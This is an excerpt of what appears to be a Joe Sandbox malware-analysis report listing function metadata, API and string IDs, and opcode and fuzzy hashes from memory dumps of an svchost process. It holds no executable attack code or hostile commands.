                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                          • API String ID: 3215553584-4202648911
                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction ID: 8bad8d7fc1edff6da2c1dadc0fd5d6aa1e877b33c2c41bbe9f95049790395e2c
                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                          • Instruction Fuzzy Hash: 9C618B3E6036C2C6FA759B79E54C72A2BA1A7857C8F51C527CA0E47FA8DE34C849C300
                                                          Function 00000282B8DAAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 30ab5579bdda2e2cabab392bbbe4d9617067b7ae1beb5b522b938b7b766e2d90
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: DD61263B602A85CAEB209F65D44439D77A0F748BCCF248216EF6D17B98DB38C599C700
                                                          Function 00000282B8D7A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: ca5734f81921064f9ff6b860bf5181c6827a746e1330f9c89348f6ac6c68cd9c
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: ED51363E1032C2CAEB648FB5954835C77A0F355BD8F189216EA9D8BE95CF38D498C700
                                                          Function 00000282B8DAAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction ID: 411c9509af3fcabf4f1ce4f8d6b6cf05806ff159a955f921fc8831c3144dd764
                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                          • Instruction Fuzzy Hash: 30515C7A2072C2CAEB648B35958836D77A0E354BD9F248217EBAD47ED5CF38D558C700
                                                          Function 00000282B8D78405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction ID: 541e4d22480a736bad41cde7fd008f10d98aedc26db61b223afbf05b86637149
                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                          • Instruction Fuzzy Hash: B451873E7036C2CAEB568B35E448B1927A5F354BDCF51C126DA0A43B88EF74D849CB08
                                                          Function 00000282B8D783E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 3242871069-629598281
                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction ID: 932d0ab59e7e8737ede085399a6b2e9a1bacb8dd3815f9c53b3ddb668853aa65
                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                          • Instruction Fuzzy Hash: 3A31433A3036C2D6E7169B22E848B197BA5F340BDCF55C016AE5A07B88DF38D949C708
                                                          Function 00000282B8DB2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction ID: bfaea61f490900e60250cf408a996ac2ea43cdfbf58b89eb3fab121627ff85e7
                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                          • Instruction Fuzzy Hash: ECD18936B16A82C9E711CFB9D4483AC3BA1E354BE8F148216DE5E97F99DE34C50AC740
                                                          Function 00000282B8DA14A4 Relevance: 6.3, APIs: 5, Instructions: 39memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction ID: 94a158f16ca5645ef77b3d7c2524c4314b56fc0fe74a2514d8106b62d8abe333
                                                          • Opcode Fuzzy Hash: 23e5596e6afe4154b2baf6c6de4ac956f245c11af45a2c6a236834124d1c642c
                                                          • Instruction Fuzzy Hash: 36014C3A603AD5D6E704DFB6F90824A67A4F788FC9F048426EB5E43B29DE38C459C740
                                                          Function 00000282B8DB2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction ID: 8c7ea7ca4487ebc5be949b3549fd927877593f9e8ab6a9d65cdcd7a4c676941f
                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                          • Instruction Fuzzy Hash: B4919C3B613693C5FB619F7694887AD2BA0A704BDCF14810ADE0E57E98DE34C88BC704
                                                          Function 00000282B8DA7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction ID: 868bde1c0c4da98c6ac1e282b3af667649bc45eeff511ea3adf040886b36ab98
                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                          • Instruction Fuzzy Hash: 3D11EF36712B45C9EF008B70E8593A833A4F75979CF441D26DA6D46B98DF78C1988380
                                                          Function 00000282B8DA253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction ID: b2e44e06e273ddaa13a6d48965f166220a719b52d8146d756ee595afc1c77d90
                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                          • Instruction Fuzzy Hash: 4571613A2037C3C6E6659E36D8483AA6795F3897C8F648027DF2E53F89DE35C6498700
                                                          Function 00000282B8D79E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction ID: 1bd3a8483757b3192f021d13f81ccac3fbfdab8b5c862e1578d44436157d3fcc
                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                          • Instruction Fuzzy Hash: 0161323BA02A85DAEB209F65D48479D77A0F348BCCF148616EE8D17B99DF38D199C700
                                                          Function 00000282B8DA2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction ID: c2fdd747936d26fd4e5804d6743d8fcc23eb43360527aa620b48fadba51c1598
                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                          • Instruction Fuzzy Hash: 9C51B33A6073C3C1E6689B3AA05C3AAA751F395BC8F648136DF6D03F89CE79C5088740
                                                          Function 00000282B8DB26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction ID: 6d9a099b402082fc99d087d5ee6bffcd61dc796e1771ce2a67e779a5bd35bb0f
                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                          • Instruction Fuzzy Hash: 20417137616A82C6DB20DF35E8487A967A1F7987D8F508022EE4D87B94DF3CC546C740
                                                          Function 00000282B8DA94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction ID: f351af9562ec7692dc97ba195ae04d4a81ad169a1bda4b6846b9ca1b25b00a09
                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                          • Instruction Fuzzy Hash: 46113D3A216B8182EB618F25F44435977E5F788B98F688221EF9C07B58DF3DC555CB00
                                                          Function 00000282B8D77356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                          • API String ID: 592178966-758928094
                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction ID: 9564adc6dbca56976820c2dfd7c0772ac743ec745eec233e00cc856e5b4deca3
                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                          • Instruction Fuzzy Hash: 91E08675642B85D0DF029F31E84439833A4DB58BA8B49D123995C06311FE38D1EDC300
                                                          Function 00000282B8D773B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2608769676.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8d70000_svchost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: Locator'$riptor at (
                                                          • API String ID: 592178966-4215709766
                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction ID: f5e5b17f98ce84d415e5f6cf03815f67e7bba4c5dd4dd5971cf9f2538e923b70
                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                          • Instruction Fuzzy Hash: 30E08675602B85C0DF029F31D4402987364E758B98B88D123C95C06311FE38D1E9C300
                                                          Function 00000282B8DA1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2609643489.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_282b8da0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction ID: 6f961fa92406e22af9486cbf339adb577eac3380b9d042d51504a9de33c6f657
                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                          • Instruction Fuzzy Hash: 53113D39603B8AC1EE54DB76E44832967A5FB89FC8F288126DF5E57B65DF38C4468300